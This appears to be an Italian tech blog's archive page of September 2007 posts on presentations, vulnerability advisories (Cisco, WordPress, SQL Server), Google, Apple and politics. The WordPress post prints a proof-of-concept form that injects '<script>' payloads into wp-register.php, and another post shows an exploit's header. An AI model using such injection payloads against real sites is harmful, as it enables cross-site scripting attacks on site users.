Passa ai contenuti principali

Post

Visualizzazione dei post da Settembre, 2007

Microsoft - Steve Ballmer e le presentazioni

Da molto tempo mi sto appassionando al "mondo delle presentazioni". Non posso dire di essere bravo, ma me la cavo, e qualche dritta letta qua e là fa è sempre comodo.

Presentation Zen: Learning from Bill Gates & Steve Jobs
Bill has more credibility than you or I will ever have; he's one of the most famous people on the planet. But his presentations are usually weak in the other five areas. They are rarely simple (though the topics are not overly complex), his visuals are cluttered, he speaks in abstractions with few if any surprises and little emotion (Steve Ballmer, on the other hand, gets high marks for emotion VIDEO).
In un articolo che compara i due maggiori performer in tal senso (Bill Gates e Steve JOBS non Ballmer) trovo questo video ...

[googlevideo=http://video.google.com/videoplay?docid=1274983729713522403]
Egregio mr. Ballmer,
I have 3 words for you, "YOU ARE IDIOT"!
PS: La musichetta da "centro commerciale" è veramente triste :) Ballmer LIC…

Cisco Catalyst 6500 and Cisco 7600 Loopback Access Control Bypass Vulnerability

Bugtraq ID: 25822


Class: Access Validation Error


CVE:


Remote: Yes


Local: No


Published: Sep 26 2007 12:00AM


Updated: Sep 28 2007 04:39PM


Credit: The vendor credits Lee E. Rian with the discovery of this vulnerability.


Vulnerable:




Cisco Catalyst 7600 3.1 (1a)WS-X6380-NAM

Cisco Catalyst 7600 3.1 (1a)WS-SVC-NAM-2

Cisco Catalyst 7600 3.1 (1a)WS-SVC-NAM-1

Cisco Catalyst 7600 2.2 (1a)WS-SVC-NAM-2

Cisco Catalyst 7600 2.2 (1a)WS-SVC-NAM-1

Cisco Catalyst 7600 2.1 (2)WS-X6380-NAM

Cisco Catalyst 7600 Sup720/MSFC3

Cisco Catalyst 7600 Sup2/MSFC2

Cisco Catalyst 6500 7.6 (1)

Cisco Catalyst 6500 7.5 (1)

Cisco Catalyst 6500 5.4.1

Cisco Catalyst 6500 3.1 (1a)WS-X6380-NAM

Cisco Catalyst 6500 3.1 (1a)WS-SVC-NAM-2

Cisco Catalyst 6500 3.1 (1a)WS-SVC-NAM-1

Cisco Catalyst 6500 2.2 (1a)WS-SVC-NAM-2


[From Cisco Catalyst 6500 and Cisco 7600 Loopback Access Control Bypass Vulnerability]

Lasciatemi aggiungere ... Per fortuna che se ne sono accorti in Cisco di questa "cosuccia" altrimenti sai che disastro?

Wordpress Time Setting

Mi sono accorto solo adesso che potevo agilmente risolvere i miei problemi di ... tempo ... aggiustando qualche parametro sull'interfaccia di amministrazione.
Mi sento un fenomeno (in negativo s'intende)

Excel Bug e la correttezza dell'informazione

Perché queste considerazioni? Semplice, tra poco arriverà al telegiornale il fatto che Excel 2007… sbaglia i conti. Provate a scrivere in una cella =77,1 * 850 e vedrete che il risultato visualizzato è 100000. Fate la stessa operazione con una calcolatrice e vedrete che il numero è 65535 (in realtà un numero molto vicino…).


[From I bug come evento statistico - Marco Russo]

Mah! Non mi sento nessuno per giudicare quello che dice Marco Russo, ma un BUG è un BUG che sia ammissibile statisticamente o meno. Soprattutto, è un bug "chiacchierato" quando va ad intaccare la funzione base dell'applicativo cioè TRATTARE NUMERI, molto semplicisticamente parlando!

Before I try to explain this, I should disclose that I did work on the Excel team, but that was thirteen years ago. I haven’t been there for a long time. I don’t even think I know anyone on that team any more. I’m just trying to explain the bug a little bit as a public service.


The first thing you have to understand is …

(IN)Secure Magazine's issue 13

E' disponibile da ieri il numero di settembre di INSecure Magazine. Per chi non lo sapesse, e con questo voglio bacchettarvi nel caso vi riteniate una persona della categoria, è quel classico tipo di rivista che vi fà esclamare "troppo bella per essere free". Una rivista che tratta la sicurezza da un punto di vista industriale/aziendale, con un occhio sempre vigile sulle nuove tecnologie. Caldamente consigliata la lettura.
Tags: , ,

Tempi di statistiche - I partiti e i condannati

Non penso ci sia da commentare molto visti i grafici . . .
24 condannati in via definitiva ci rappresentano. Nessuno di loro, dopo l’otto settembre, ha fatto un passo indietro. Si è dimesso. Chi lo avesse fatto sarebbe diventato un eroe, il precursore di una nuova politica. Che ha radici in parole dimenticate: morale, etica, giustizia. Che si ispira a servitori dello Stato come Ambrosoli, Borsellino, Falcone, Livatino, Chinnici, Dalla Chiesa. [From I partiti e i condannati]
Di seguito la lista NOMINALE:

Berruti Massimo Maria (FI): favoreggiamento
Biondi Alfredo (FI): evasione fiscale (reato poi depenalizzato)
Bonsignore Vito (Udc): corruzione
Borghezio Mario (Lega Nord): incendio aggravato
Bossi Umberto (Lega Nord): finanziamento illecito e istigazione a delinquere
Cantoni Giampiero (FI): corruzione e bancarotta
Carra Enzo (Margherita): falsa testimonianza
Cirino Pomicino Paolo (Dc): corruzione e finanziamento illecito
De Angelis Marcello (An): banda armata e associazione sovversiva
D’Elia Sergio…

MeTTeG '07

MeTTeG 2007 intends to bring together researchers, teachers and practitioners active in the area of
electronic government from different perspectives and disciplines with a focus
on the role played by the information and communication technologies. The main keywords are: methodologies,
technologies and tools. Methodologies play an increasingly important role in the
management and definition of e-Government initiatives. Technologies improve their efficiency and effectiveness while tools
allow new specific services and functionalities.

Keynote Speakers:
ADA SCUPOLA - Roskilde University, Roskilde, Denmark
STUART W. SHULMAN - University of Pittsburgh, Pittsburgh, USA

http://conferences.cs.unicam.it/metteg07/

Microsoft SQL Server sqldmo.dll ActiveX Buffer Overflow Vulnerability

Incuriosito dai commenti di un mio precedente post mi sono messo a fare un pò di ricerca in merito, direte voi ma la mattina non hai niente da fare???
Intanto cominio col dire che "mi sono sbagliato". Perché la vulnerabilità che ho segnalato è si del 2000, perché il componente che ne "soffre" è del 2000 :)
Tale DLL è stata ereditata, pari pari, nella nuova versione di Sql Server 2005, espandendo la vulnerabilità anche a questa fascia di prodotti.
L'advisor recita così:


Microsoft SQL Server 'sqldmo.dll' ActiveX Control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.


Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.


[From Microsoft SQL Server sqldmo.dll ActiveX…

WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities

Ritengo scortese pubblicare questo genere di informazioni soprattutto quando si parla del "padrone di casa" ... ma tutto sommato ... la sicurezza è un processo aperto e condiviso.

Bugtraq ID: 25769

Class: Input Validation Error

CVE: Remote: Yes Local: No

Published: Sep 22 2007 12:00AM

Updated: Sep 22 2007 12:00AM

Credit: Adrian Pastor is credited with the discovery of these vulnerabilities.

Vulnerable: WordPress WordPress 2.0

Ed ecco la PoC

[sourcecode language='xml']
<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert…

0day: PDF pwns Windows - Adobe pdf exploited

Il termine 0Day oramai è una buzzword bella e buona.

Ma come sempre accade c'è da prestare orecchio quando chi la usa è una persona (in questo caso team) di rilieavo, mi riferico ai ragazzi di GNUCitizen



Quello che si può leggere nella loro sezione project suona pressappoco così:
I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. [From 0day: PDF pwns Windows | GNUCITIZEN]
E la raccomandazione è ...
The issue is quite critical given the fact that PDF documents are in the core of today’s modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available.
... penso che un gesto così magna…

FreeUser - WordPress Maintenance

Tomorrow around 9AM Pacific time we will performing some back-end code changes that may result in a few spots of weirdness for things relating to categories. This includes categorizing posts and links. The maintenance should only take a few minutes but I have allocated a couple hours just in case. Once the maintenance is complete you should see new functionality in your admin area so keep your eyes peeled. I will update this thread once the maintenance is complete. [From Scheduled Maintenance -- Friday 9/21 « WordPress.com Forums]

Notizie dal mondo

Sono mancato meno di 48 ore dal mio feed reader e non vi dico le novità. Google Reader abbandona i Labs, sotto forma di lettera a "cuore" aperto:


But don't be sad. We'll always remember the good times: our first date, when we rolled out the new user-interface together, and the way sometimes we could just sit there and not talk at all because you are just a label. [From Official Google Reader Blog]
L'iPhone sta ufficialmenteapprodando in Eurolandia, mentre l'Italia sta a guardare (che poveracci di dirigenti si trovano in ita)
Bill Gates fà uno forzo immondo nello spiegare il concetto di umanità
...


... è sempre più una rivista scandalistica ... ma mi riservo di non linkare niente...
Voi direte ... "e che c'è di nuovo?" Uhm, forse niente ... però ... Google Presentation è proprio bello ;) (chi ha detto webcast a costo zero?)


Google promuove Google Reader

Post Flash:
Google promuove dai suoi labs Google Reader


che ora viene considerata "matura per il mercato"


che sia in vista una integrazione con la suite Google Apps?

Next generation malware: Windows Vista’s gadget API

Come ogni giorno (non è vero ma lasciate che ci creda) leggo le news del mio feed, e come un coniglio dal cilindro ecco che esce fuori da google reader
A paper has just been released on the Windows Vista's gadget API. The abstract is as follows:
Windows has had the ability to embed HTML into itâ??s user interface for many years. Right back to and including Windows NT 4.0, it has been possible to embed HTML into the task bar, but the OS has always maintained a sandbox, from which the HTML has been unable to escape. All this changes with Windows Vista. This paper seeks to inform system administrators, users and the wider community on both potential attack vectors using gadgets and the mitigations provided by Windows Vista.
The full paper can be found at http://www.portcullis-security.com/165.php.
Cheers, Tim
--
Tim Brown [From SecurityFocus]
Non c'avevo mai pensato in effetti gran bella pensata e bel white paper... clicco sul post vengo redirezionato sul forum di Secu…

Google - masterminds day

Tra i prodotti presentati nel corso dell’evento ci saranno i GEO products, con la novità della navigazione nello spazio grazie a Google Sky, i Google Gadgets, delle piccole applicazioni eseguibili su più siti, tra cui iGoogle, la pagina personalizzata di Google, i Google Mapplets, dei Google Gadgets che manipolano le mappe attraverso chiamate Javascript che sono incluse nelle API di Google Maps e che si possono incorporare nel sito di Google Maps, Google Web Toolkit (GWT), un framework open source che permette di scrivere facilmente applicazioni in AJAX, come Google Maps e Gmail, usando Java invece di JavaScript e GData, le API che utilizza Google e che permettono ad applicazioni di terze parti di interfacciarsi con i propri servizi. [From Google - masterminds day]

Microsoft SQL Server Distributed Management Objects Buffer Overflow

Vecchi o no i bug exploitabili sono sempre bene accetti!

[sourcecode language='xml']
<!--

+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference &amp; Thanks :
code by rgod http://www.milw0rm.com/exploits/4379
code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)

-->

[/sourcecode]

Hutchinson Whampoa vende 3 Italia (H3g)

Hutchinson Whampoa vende 3 Italia (H3g) Una notizia che potrebbe rimischiare le carte del mercato. Hutchinson Whampoa vende 3 Italia (H3g).
3 Italia, the 3G mobile operator, has been put up for sale in a move that could pave the way for its owner, Hutchison Whampoa, to shed its British sister business.
Lo riporta il Blog di Stefano Quintarelli (ormai pietra miliare della rete), citando le parole del Times Online che ha pubblicato un articolo intero su considerazioni, indiscrezioni e documentazione. Sempre secondo il Times Online, il candidato numero 1 per l'acquisizione potrebbe essere Deutsche Telekom. Da 3 Italia nessun commento. [From Hutchinson Whampoa vende 3 Italia (H3g) - ICTBLOG.it]
Ok, a chi ultimamente mi dice che sono diventato un fissato della mela, dico che ... avete ragione, oramai vedo morsi in ogni dove. Nello sperare ed aspettare che l'infatuazione di cui sopra lascerà più spazio ad una nuova lucidità provate a seguire il mio ragionamento.
La Ger…

QNX Publishes Neutrino Source Code and Opens Development Process

Access to QNX source code is free, but commercial deployments of QNX Neutrino runtime components still require royalties, and commercial developers will continue to pay for QNX Momentics® development seats. However, noncommercial developers, academic faculty members, and qualified partners will be given access to QNX development tools and runtime products at no charge. [From QNX Press Release: QNX Publishes Neutrino Source Code and Opens Development Process]

Finalmente anche QNX è diventato "open source" (o almeno ci prova), Francesco che c'abbiano spiato?! ;)

UPDATE: Qui potete trovare le nuove licenze

iPhone in Europa con T-Mobile?

iPhone arriva in Europa il 12 Novembre. Con T-Mobile. Questo almeno è ciò che lascia intendere una locandina pubblicitaria circolata sulla rete in queste ultime ore. Ovviamente è più probabile si tratti di un falso, un fake costruito ad arte per prendere in giro coloro i quali attendono l'arrivo di iPhone in Europa al pari della venuta del Messia.




.... Pur continuando a considerare il tutto con una giusta dose di scetticismo, vi è da segnalare una ulteriore notizia che potrebbe andare a suffragare ancor di più quanto riportato nel volantino: l'azienda statunitense InterDigital, specializzata nello sviluppo e realizzazione di apparati di comunicazione wireless, ha infatti dichiarato, all'interno di un documento consegnato alla SEC - Security and Exchange Commission - di aver sigliato un accordo di licenza con Apple della durata di sette anni per equipaggiare iPhone (sia le versioni attuali, sia le eventuali versioni future) con apparati tecnologici 3G di InterDigital. In…

Apple - Un modo diverso di fare comunicazione aziendale

Ogni tanto mi domando come mai sia così affezionato al mondo Apple Inc, tutto sommato non posso dire di essere un utente di vecchia data con meno di 9 mesi di esperienza da Mac User no?

C'è qualcosa di diverso in Apple. Tutti i discorsi di tipo commerciale e marketing sono assolutamente applicabili come per una qualsiasi azienda ma il loro "coccolare" l'utenza è assolutamente unico.

Mi trovavo qualche mese fa davanti ad una presentazione commerciale di IBM, dove il "venditore" di turno disse una cosa assolutamente ragionevole spiegando come secondo lui (IBM?) sia segmentato il mercato dei prodotto (IT inclusa).

Riassumendo il discorso si possono classificare aziende (e prodotti) in tre categorie:

Chi produce prodotti su larga scala, con basso costo di produzione, relativamente bassa qualità, ed alto profitto per pezzo venduto. Capite che lo scopo di un'azienda di questo tipo è esclusivamente vendere il prodotto per poi disinteressarsi completamente di quest…

FreeUser: Google Reader Shared Posts

Se non l'avete già notato ...
... vi segnalo che qua di fianco, sfruttando le fantastiche widget di wordpress, ho aggiunto una sezione dedicata ai post che più mi colpiscono o che trovo interessanti.
Google Reader in fondo ad ogni post mette a disposizione i seguenti pulsanti


vi lascio immaginare cosa accade quando si fà click su "Share"

Non necessariamente si può trovare roba seria (ma questo vale per tutto il blog) oppure inerente alla mia attività (se poi sapete qual'è ditemelo che mi sento un personaggio in cerca d'autore).
Diciamo che riguarda tutto quello che avrei voluto postare e per cui non ho trovato un adeguato tempo d'approfondimento.


Pentagon Hacked by Chinese Miltary

I dettagli della questione sono quantomeno vaghi ma sembra che l'attacco al sistema di sicurezza del pentagono dello scorso Giugno sia stato effettuato dal alcuni hacker dell'esercito cinere! (People’s Liberation Army).
One senior US official said the Pentagon had pinpointed the exact origins of the attack. Another person familiar with the event said there was a “very high level of confidence…trending towards total certainty” that the PLA was responsible. The defence ministry in Beijing declined to comment on Monday.
Angela Merkel, Germany’s chancellor, raised reports of Chinese infiltration of German government computers with Wen Jiabao, China’s premier, in a visit to Beijing, after which the Chinese foreign ministry said the government opposed and forbade “any criminal acts undermining computer systems, including hacking”.
Incredibile vero? Attacchi terroristici mirati a raccogliere informazioni riservate sembrano non essere solo una "cosa da film".Seguendo gli in…

ISO: Microsoft Open XML non passa, per ora!

Le crociate sono state sempre il mio forte, e come me probabilmente altre centinaia di persone hanno posto veti su veti alla non approvazione di questo standard il risultato è che


Così ISO ha ieri formalmente comunicato al mondo quanto era trapelato nelle ore precedenti, ossia l'esito del primo round di voto sulla standardizzazione di OOXML, Office Open XML, la specifica sostenuta da Microsoft e integrata nei suoi prodotti di punta ma invisa ad alcuni suoi competitor e ad una parte del mondo open source. [From PI: ISO, OpenXML al primo round non passa]


Microsoft's failed bid to make its "Open XML" format an ISO standard was certainly newsworthy, though it was slightly surprising to see it covered in detail in the Wall Street Journal, and to hear about it this evening on MarketPlace. [From Microsoft Open XML Failed ISO Bid Makes Big News]
Ma non sono le battaglie che fanno vincere la guerra. Tanto meno il trambusto che possiamo fare noi piccoli e tenaci utenti, come …

FreeUser: aggiornamenti

Nei ritagli di tempo in questi giorni o aggiornato la tag cloud del blog, ricategorizzando praticamente tutti i post. Un lavoraccio ma n'è valsa la pena non pensate?

Windows Vista non si connette ad Internet in Svezia

PEOPLE in the city of Lund in Sweden that use the Microsoft Vista OS can't connect to the Internet. According to this local newspaper, the reason is because Lund is a Linux city which has a a Linux server that doesn't like Vista. Lundis Energi blamed Microsoft because Vista has got a bug and it isn't going to change the configuration of the server just to cope with the flaw. A local Microsoft rep said it could probably fix the problem if Lundis Energi got in touch with it. [From Entire city of Vista users can't access the internet]

In Svezia voci dicono che ci sono famiglie con connessioni internet da 40Gbps (:shock:). In Svezia oggi però, buona parte della popolazione non può connettersi ad internet nemmeno utilizzando una ridicola connessione a 56Kb, perchè? Perchè stanno utilizzando Windows Vista!!!!

Secondo un giornale locale svedese, gli utenti che hanno installato Vista a Lund (sede anche di una nota università), non possono accedere ad internet a causa di un &q…